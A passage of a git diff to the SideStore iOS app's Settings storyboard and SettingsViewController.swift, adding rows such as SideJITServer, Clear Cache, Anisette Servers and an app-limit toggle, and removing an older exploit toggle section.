-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Jyy-x0-Owj">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Jyy-x0-Owj">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -554,19 +586,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="Qca-pU-sJh" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1012" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1023" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="Qca-pU-sJh" id="QtU-8J-VQN">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="View Refresh Attempts" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="sni-07-q0M">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="View Refresh Attempts" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="sni-07-q0M">
                                                     <rect key="frame" x="30" y="15.5" width="187.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="4d3-me-Hqc">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="4d3-me-Hqc">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -590,19 +622,19 @@
                                         </connections>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="rE2-P4-OaE" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1063" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1074" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="rE2-P4-OaE" id="qIT-rz-ZUb">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="View Error Log" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PWC-OG-5jx">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="View Error Log" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PWC-OG-5jx">
                                                     <rect key="frame" x="30" y="15.5" width="119" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="VfB-c5-5wG">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="VfB-c5-5wG">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -622,23 +654,89 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
                                         </userDefinedRuntimeAttributes>
                                         <connections>
-                                            <segue destination="g8a-Rf-zWa" kind="show" identifier="showErrorLog" id="SSW-vL-86I"/>
+                                            <segue destination="g8a-Rf-zWa" kind="show" identifier="showErrorLog" id="vFC-Id-Ww6"/>
                                         </connections>
                                     </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="VrV-qI-zXF" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="1125" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VrV-qI-zXF" id="w1r-uY-4pD">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="SideJITServer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="46q-DB-5nc">
+                                                    <rect key="frame" x="30" y="15.5" width="183" height="21"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="wvD-eZ-nQI">
+                                                    <rect key="frame" x="327" y="16.5" width="18" height="18"/>
+                                                </imageView>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="wvD-eZ-nQI" firstAttribute="centerY" secondItem="w1r-uY-4pD" secondAttribute="centerY" id="O6Y-Y1-yxv"/>
+                                                <constraint firstItem="46q-DB-5nc" firstAttribute="centerY" secondItem="w1r-uY-4pD" secondAttribute="centerY" id="ROS-YF-6jb"/>
+                                                <constraint firstItem="46q-DB-5nc" firstAttribute="leading" secondItem="w1r-uY-4pD" secondAttribute="leadingMargin" id="acd-O8-WTI"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="wvD-eZ-nQI" secondAttribute="trailing" id="taB-EP-QMM"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="eZ3-BT-q4D" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="1176" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="eZ3-BT-q4D" id="17m-VV-hzf">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Clear Cache" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="IbH-V1-ce3">
+                                                    <rect key="frame" x="30" y="15.5" width="98.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="FZe-BJ-fOm">
+                                                    <rect key="frame" x="327" y="16.5" width="18" height="18"/>
+                                                </imageView>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="FZe-BJ-fOm" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="bGv-Np-5aO"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="FZe-BJ-fOm" secondAttribute="trailing" id="ccb-JP-Eqi"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="iQJ-gN-sRF"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="leading" secondItem="17m-VV-hzf" secondAttribute="leadingMargin" id="m1g-Y6-aT5"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="VNn-u4-cN8" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1114" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1227" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VNn-u4-cN8" id="4bh-qe-l2N">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Reset Pairing File" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ysS-9s-dXm">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Reset Pairing File" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ysS-9s-dXm">
                                                     <rect key="frame" x="30" y="15.5" width="140" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="r09-mH-pOD">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="r09-mH-pOD">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -658,28 +756,28 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="fj2-EJ-Z98" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1165" width="375" height="51"/>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="e7s-hL-kv9" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="1278" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
-                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="fj2-EJ-Z98" id="BcT-Fs-KNg">
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="e7s-hL-kv9" id="yjL-Mu-HTk">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Advanced Settings" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="OcM-OM-uDE">
-                                                    <rect key="frame" x="30" y="15.5" width="154" height="20.5"/>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Anisette Servers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="eds-Dj-36y">
+                                                    <rect key="frame" x="30" y="15.5" width="135.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Pcu-Sy-yfZ">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="0dh-yd-7i9">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
                                             <constraints>
-                                                <constraint firstAttribute="trailingMargin" secondItem="Pcu-Sy-yfZ" secondAttribute="trailing" id="CFy-IO-4eb"/>
-                                                <constraint firstItem="OcM-OM-uDE" firstAttribute="centerY" secondItem="BcT-Fs-KNg" secondAttribute="centerY" id="OGl-h4-FPx"/>
-                                                <constraint firstItem="Pcu-Sy-yfZ" firstAttribute="centerY" secondItem="BcT-Fs-KNg" secondAttribute="centerY" id="R7L-4O-lTn"/>
-                                                <constraint firstItem="OcM-OM-uDE" firstAttribute="leading" secondItem="BcT-Fs-KNg" secondAttribute="leadingMargin" id="yoh-C6-UC5"/>
+                                                <constraint firstItem="0dh-yd-7i9" firstAttribute="centerY" secondItem="yjL-Mu-HTk" secondAttribute="centerY" id="8OI-PI-weT"/>
+                                                <constraint firstItem="eds-Dj-36y" firstAttribute="leading" secondItem="yjL-Mu-HTk" secondAttribute="leadingMargin" id="BqG-Ef-xQo"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="0dh-yd-7i9" secondAttribute="trailing" id="TFW-nu-jo4"/>
+                                                <constraint firstItem="eds-Dj-36y" firstAttribute="centerY" secondItem="yjL-Mu-HTk" secondAttribute="centerY" id="YiJ-OF-FXE"/>
                                             </constraints>
                                         </tableViewCellContentView>
                                         <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -696,7 +794,6 @@
                         </sections>
                         <connections>
                             <outlet property="dataSource" destination="aMk-Xp-UL8" id="c6c-fR-8C4"/>
-                            <outlet property="delegate" destination="aMk-Xp-UL8" id="moP-1B-lRq"/>
                         </connections>
                     </tableView>
                     <navigationItem key="navigationItem" title="Settings" id="Ddg-UQ-KJ8"/>
@@ -705,13 +802,14 @@
                         <outlet property="accountNameLabel" destination="CnN-M1-AYK" id="Ldc-Py-Bix"/>
                         <outlet property="accountTypeLabel" destination="434-MW-Den" id="mNB-QE-4Jg"/>
                         <outlet property="backgroundRefreshSwitch" destination="DPu-zD-Als" id="eiG-Hv-Vko"/>
-                        <outlet property="enableCowExploitSwitch" destination="Oie-te-KSQ" id="jKn-t1-gyk"/>
+                        <outlet property="disableAppLimitSwitch" destination="1aa-og-ZXD" id="oVL-Md-yZ8"/>
+                        <outlet property="noIdleTimeoutSwitch" destination="iQA-wm-5ag" id="jHC-js-q0Y"/>
                         <outlet property="versionLabel" destination="bUR-rp-Nw2" id="85I-5R-hqz"/>
                     </connections>
                 </tableViewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="SI0-mJ-Wad" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>
-            <point key="canvasLocation" x="877.60000000000002" y="43.628185907046479"/>
+            <point key="canvasLocation" x="879" y="44"/>
         </scene>
         <!--Settings-->
         <scene sceneID="L0E-XA-SxK">
@@ -721,7 +819,7 @@
                     <toolbarItems/>
                     <simulatedTabBarMetrics key="simulatedBottomBarMetrics"/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" barStyle="black" largeTitles="YES" id="Jtn-cs-Tvp" customClass="NavigationBar" customModule="SideStore" customModuleProvider="target">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="20" width="375" height="96"/>
                         <autoresizingMask key="autoresizingMask"/>
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="barTintColor" name="SettingsBackground"/>
@@ -822,7 +920,7 @@
                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
                         <subviews>
                             <textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" layoutMarginsFollowReadableWidth="YES" contentInsetAdjustmentBehavior="never" indicatorStyle="white" editable="NO" translatesAutoresizingMaskIntoConstraints="NO" id="oQQ-pR-oKc">
-                                <rect key="frame" x="0.0" y="44" width="375" height="574"/>
+                                <rect key="frame" x="0.0" y="64" width="375" height="554"/>
                                 <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
                                 <string key="text">Jay Freeman (ldid) 
 Copyright (C) 2007-2012 Jay Freeman (saurik)
@@ -925,7 +1023,7 @@ Settings by i cons from the Noun Project</string>
             </objects>
             <point key="canvasLocation" x="1697" y="313"/>
         </scene>
-        <!--Patreon-->
+        <!--Support us-->
         <scene sceneID="Lnh-9P-HnL">
             <objects>
                 <collectionViewController id="dp8-8j-vt9" customClass="PatreonViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
@@ -972,7 +1070,7 @@ Settings by i cons from the Noun Project</string>
                             <outlet property="delegate" destination="dp8-8j-vt9" id="790-Kr-6l7"/>
                         </connections>
                     </collectionView>
-                    <navigationItem key="navigationItem" title="Patreon" largeTitleDisplayMode="always" id="uUV-1f-xEq"/>
+                    <navigationItem key="navigationItem" title="Support us" largeTitleDisplayMode="always" id="uUV-1f-xEq"/>
                 </collectionViewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="qq3-Hj-S9f" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>
@@ -1056,7 +1154,7 @@ Settings by i cons from the Noun Project</string>
                                                 </textView>
                                             </subviews>
                                         </stackView>
-                                        <button opaque="NO" contentMode="scaleToFill" showsMenuAsPrimaryAction="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ba2-EY-tf5">
+                                        <button opaque="NO" contentMode="scaleToFill" showsMenuAsPrimaryAction="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ba2-EY-tf5" customClass="ErrorLogMenuButton">
                                             <rect key="frame" x="0.0" y="0.0" width="343" height="107.5"/>
                                             <accessibility key="accessibilityConfiguration">
                                                 <bool key="isElement" value="NO"/>
@@ -1105,11 +1203,73 @@ Settings by i cons from the Noun Project</string>
                             </barButtonItem>
                         </rightBarButtonItems>
                     </navigationItem>
+                    <connections>
+                        <segue destination="7gm-d1-zWK" kind="presentation" identifier="showErrorDetails" id="9vz-y6-evp"/>
+                    </connections>
                 </tableViewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="rU1-TZ-TD8" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>
             <point key="canvasLocation" x="1697" y="1774"/>
         </scene>
+        <!--Error Details View Controller-->
+        <scene sceneID="XNO-Yg-I7t">
+            <objects>
+                <viewController id="xB2-Se-VVg" customClass="ErrorDetailsViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
+                    <view key="view" contentMode="scaleToFill" id="eBQ-se-VIy">
+                        <rect key="frame" x="0.0" y="0.0" width="375" height="647"/>
+                        <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
+                        <subviews>
+                            <textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" editable="NO" textAlignment="natural" translatesAutoresizingMaskIntoConstraints="NO" id="ctd-NB-4ov">
+                                <rect key="frame" x="0.0" y="0.0" width="375" height="647"/>
+                                <color key="backgroundColor" systemColor="systemBackgroundColor"/>
+                                <color key="textColor" systemColor="labelColor"/>
+                                <fontDescription key="fontDescription" style="UICTFontTextStyleBody"/>
+                                <textInputTraits key="textInputTraits" autocapitalizationType="sentences"/>
+                            </textView>
+                        </subviews>
+                        <viewLayoutGuide key="safeArea" id="Nm8-69-Ngi"/>
+                        <color key="backgroundColor" systemColor="systemBackgroundColor"/>
+                        <constraints>
+                            <constraint firstItem="ctd-NB-4ov" firstAttribute="leading" secondItem="eBQ-se-VIy" secondAttribute="leading" id="Cv1-Te-gBH"/>
+                            <constraint firstItem="ctd-NB-4ov" firstAttribute="top" secondItem="eBQ-se-VIy" secondAttribute="top" id="HRY-Rg-iMI"/>
+                            <constraint firstAttribute="trailing" secondItem="ctd-NB-4ov" secondAttribute="trailing" id="Lc1-K7-iuq"/>
+                            <constraint firstAttribute="bottom" secondItem="ctd-NB-4ov" secondAttribute="bottom" id="zCz-Cy-Y5z"/>
+                        </constraints>
+                    </view>
+                    <navigationItem key="navigationItem" id="XpE-V9-EaY">
+                        <barButtonItem key="rightBarButtonItem" style="done" systemItem="done" id="rnr-dX-4Ev">
+                            <connections>
+                                <segue destination="ZSp-1n-UJ9" kind="unwind" unwindAction="unwindFromErrorDetails:" id="TFu-zD-QyF"/>
+                            </connections>
+                        </barButtonItem>
+                    </navigationItem>
+                    <connections>
+                        <outlet property="textView" destination="ctd-NB-4ov" id="x2C-9R-Xz1"/>
+                    </connections>
+                </viewController>
+                <placeholder placeholderIdentifier="IBFirstResponder" id="8AM-Vx-XTN" userLabel="First Responder" customClass="UIResponder" sceneMemberID="firstResponder"/>
+                <exit id="ZSp-1n-UJ9" userLabel="Exit" sceneMemberID="exit"/>
+            </objects>
+            <point key="canvasLocation" x="3389.5999999999999" y="1772.5637181409297"/>
+        </scene>
+        <!--Navigation Controller-->
+        <scene sceneID="4LJ-Od-dCK">
+            <objects>
+                <navigationController automaticallyAdjustsScrollViewInsets="NO" id="7gm-d1-zWK" sceneMemberID="viewController">
+                    <toolbarItems/>
+                    <navigationBar key="navigationBar" contentMode="scaleToFill" id="dI0-sh-yGf">
+                        <rect key="frame" x="0.0" y="0.0" width="375" height="56"/>
+                        <autoresizingMask key="autoresizingMask"/>
+                    </navigationBar>
+                    <nil name="viewControllers"/>
+                    <connections>
+                        <segue destination="xB2-Se-VVg" kind="relationship" relationship="rootViewController" id="RpP-UM-JfJ"/>
+                    </connections>
+                </navigationController>
+                <placeholder placeholderIdentifier="IBFirstResponder" id="OXW-bf-HIj" userLabel="First Responder" customClass="UIResponder" sceneMemberID="firstResponder"/>
+            </objects>
+            <point key="canvasLocation" x="2554" y="1773"/>
+        </scene>
     </scenes>
     <resources>
         <image name="Next" width="18" height="18"/>
@@ -1122,7 +1282,10 @@ Settings by i cons from the Noun Project</string>
             <color white="0.0" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
         </systemColor>
         <systemColor name="labelColor">
-            <color red="0.0" green="0.0" blue="0.0" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color white="0.0" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+        </systemColor>
+        <systemColor name="systemBackgroundColor">
+            <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
         </systemColor>
     </resources>
 </document>

AltStore/Settings/SettingsViewController.swift

@@ -6,17 +6,18 @@
 //  Copyright © 2019 Riley Testut. All rights reserved.
 //
 
+import UIKit
+import SwiftUI
+import SafariServices
+import MessageUI
 import Intents
 import IntentsUI
-import MessageUI
-import SafariServices
-import UIKit
 
 import AltStoreCore
 
-private extension SettingsViewController
+extension SettingsViewController
 {
-    enum Section: Int, CaseIterable
+    fileprivate enum Section: Int, CaseIterable
     {
         case signIn
         case account
@@ -24,25 +25,28 @@ private extension SettingsViewController
         case appRefresh
         case instructions
         case credits
-        case cowExploit
         case debug
     }
     
-    enum AppRefreshRow: Int, CaseIterable
+    fileprivate enum AppRefreshRow: Int, CaseIterable
     {
         case backgroundRefresh
+        case noIdleTimeout
+        case disableAppLimit
         
         @available(iOS 14, *)
         case addToSiri
         
-        static var allCases: [AppRefreshRow]
-        {
-            guard #available(iOS 14, *) else { return [.backgroundRefresh] }
-            return [.backgroundRefresh, .addToSiri]
+        static var allCases: [AppRefreshRow] {
+            var c: [AppRefreshRow] = [.backgroundRefresh, .noIdleTimeout]
+            guard #available(iOS 14, *) else { return c }
+            if !ProcessInfo().sparseRestorePatched { c.append(.disableAppLimit) }
+            c.append(.addToSiri)
+            return c
         }
     }
     
-    enum CreditsRow: Int, CaseIterable
+    fileprivate enum CreditsRow: Int, CaseIterable
     {
         case developer
         case operations
@@ -50,13 +54,17 @@ private extension SettingsViewController
         case softwareLicenses
     }
     
-    enum DebugRow: Int, CaseIterable
+    fileprivate enum DebugRow: Int, CaseIterable
     {
         case sendFeedback
         case refreshAttempts
         case errorLog
+        case refreshSideJITServer
+        case clearCache
         case resetPairingFile
